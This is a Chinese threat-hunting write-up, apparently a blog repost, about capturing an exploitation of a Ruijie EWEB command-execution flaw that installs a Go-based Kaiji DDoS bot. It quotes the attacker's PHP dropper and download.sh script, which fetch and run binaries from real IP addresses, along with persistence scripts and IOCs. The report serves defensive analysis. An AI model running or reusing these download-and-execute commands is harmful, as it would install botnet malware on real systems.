通过一个Nday发现的DDOS家族

关键字:Linux/go/Kaiji/20220615



在做威胁狩猎的时候部署蜜罐已经很难捕捉到高端攻击了,可以尝试下部署真实设备及网络环境进行监测,做一个真实的狩猎场。


2022年6月15日在一台“锐捷网络-EWEB网管系统”的设备上捕获到了一个Nday的利用(/guest_auth/guestIsUp.php接口命令执行)。漏洞被利用后自动化进行脚本写入、脚本下载、下载僵尸程序、持久化等一系列操作。


1、捕获操作如下

1.1、脚本写入操作

利用上述漏洞在tmphtmlddiservertest644下写入test644.php文件


<?php exec('wget http://209.141.60.137:4679/llii;chmod 777 llii;./llii');?>


同时还会在tmphtmlddiserver目录下创建test644_tmp目录,具体做了什么已经查不到了,怀疑是下载临时文件并运行。


1.2、脚本下载

下载download.sh保存在/tmp/目录下

#!/bin/shaddress="103.254.72.193:808"os=`uname -s`arch=`uname -m`if [ $os = "Linux" ]; then       case $arch in       "i"*"86")       wget -t 1 http://$address/linux_386||curl -O --connect-timeout 10 http://$address/linux_386;chmod +x linux_386;./linux_386||rm -f linux_386       ;;       "x86_64")       wget -t 1 http://$address/linux_amd64||curl -O --connect-timeout 10 http://$address/linux_amd64;chmod +x linux_amd64;./linux_amd64||rm -f linux_amd64       ;;       "amd64")       wget -t 1 http://$address/linux_amd64||curl -O --connect-timeout 10 http://$address/linux_amd64;chmod +x linux_amd64;./linux_amd64||rm -f linux_amd64       ;;       "mips")       wget -t 1 http://$address/linux_mips||curl -O --connect-timeout 10 http://$address/linux_mips;chmod +x linux_mips;./linux_mips||rm -f linux_mips       wget -t 1 http://$address/linux_mipsel||curl -O --connect-timeout 10 http://$address/linux_mipsel;chmod +x linux_mipsel;./linux_mipsel||rm -f linux_mipsel       wget -t 1 http://$address/linux_mips_softfloat||curl -O --connect-timeout 10 http://$address/linux_mips_softfloat;chmod +x linux_mips_softfloat;./linux_mips_softfloat||rm -f linux_mips_softfloat       wget -t 1 http://$address/linux_mipsel_softfloat||curl -O --connect-timeout 10 http://$address/linux_mipsel_softfloat;chmod +x linux_mipsel_softfloat;./linux_mipsel_softfloat||rm -f linux_mipsel_softfloat       ;;       "mips64")       wget -t 1 http://$address/linux_mips64||curl -O --connect-timeout 10 http://$address/linux_mips64;chmod +x linux_mips64;./linux_mips64||rm -f linux_mips64       wget -t 1 http://$address/linux_mips64el||curl -O --connect-timeout 10 http://$address/linux_mips64el;chmod +x linux_mips64el;./linux_mips64el||rm -f linux_mips64el       wget -t 1 http://$address/linux_mips64_softfloat||curl -O --connect-timeout 10 http://$address/linux_mips64_softfloat;chmod +x linux_mips64_softfloat;./linux_mips64_softfloat||rm -f linux_mip


1.3、下载僵尸程序

通过上一步运行download.sh后根据操作系统不同架构会下载不同的僵尸程序运行,并删除自身。


1.4、持久化

程序运行后会做一些持久化的工作。

/etc/rc.d/init.d/linux_kill持久化

#!/bin/sh    ### BEGIN INIT INFO    #chkconfig: 2345 10 90    #description:System.img.config    # Default-Start:  2 3 4 5    # Default-Stop:    ### END INIT INFO    /boot/System.img.config    exit 0


写入文件行为:

/boot/System.img.config /etc/32678 /etc/id.services.conf /etc/init.d/linux_kill


2、样本获取

2.1、HFS获取样本

通过1.1发现url下载地址http://209.141.60.137:4679/llii,但是目前已经无法下载。但是通过端口扫描发现开放了其他端口。

通过一个Nday发现的DDOS家族


http://209.141.60.137:6359/发现HFS

通过一个Nday发现的DDOS家族

可以获取样本liss_a5和liss_a6两个。


2.2、URL获取样本

通过1.2脚本中地址可以获取

通过一个Nday发现的DDOS家族



三、样本分析

3.1、liss_a6和liss_a5

以liss_a6为例:

3.1.1、基本信息

MD5  d97d73970fb455875ade28aac1bf6fb2SHA-1  98cce5ef07f4540a8cf1d1c31e0013fb2f2798e3File type  ELFFile size  4.44 MB (4653056 bytes)go语言编写


3.1.2、网络行为

angelcyberspace.xyz20.24.75.127:8087 (TCP)


3.1.3、文件行为

释放并执行文件

/etc/id.services.conf /etc/32678 /boot/System.img.config


/etc/32678 为脚本文件

#!/bin/shwhile [ 1 ]; dosleep 60/etc/id.services.confdone


3.2、linux_386

3.2.1、基本信息

MD5  8c91f574e4a6f867036898c647e0e094SHA-1  ff5ba9cc14361d1954b56fe97752a2fcd87e69baFile type  ELFFile size  5.01 MB (5251072 bytes)go语言编写


3.2.2、网络行为

tomca1.com103.254.72.193:10099 (TCP) 103.254.72.193:808 (TCP)


3.2.3、文件行为

写入并执行文件

/etc/id.services.conf /etc/32678 /boot/System.img.config


3.3、家族分析

目测两个样本为同一家族,但网络通信地址不同,是不是使用同一僵尸程序的两个团伙还不确定。

通过逆向分析样本发现程序函数名混用英文和拼音,如main_rundingshi、main_runganran、main_runshouhu、main_runkaiji。


4、IOC总结

4.1、网络监测

209.141.60.137angelcyberspace.xyz20.24.75.127tomca1.com103.254.72.193

4.2、文件检测

/tmp/html/ddi/server/test644/test644.php/tmp/html/ddi/server/test644_tmp//tmp/download.sh/etc/rc.d/init.d/linux_kill/boot/System.img.config /etc/32678 /etc/id.services.conf /etc/init.d/linux_kill


原文始发于微信公众号(也许安全):通过一个Nday发现的DDOS家族

版权声明:admin 发表于 2022年6月24日 下午2:57。
转载请注明:通过一个Nday发现的DDOS家族 | CTF导航

相关文章

暂无评论

暂无评论...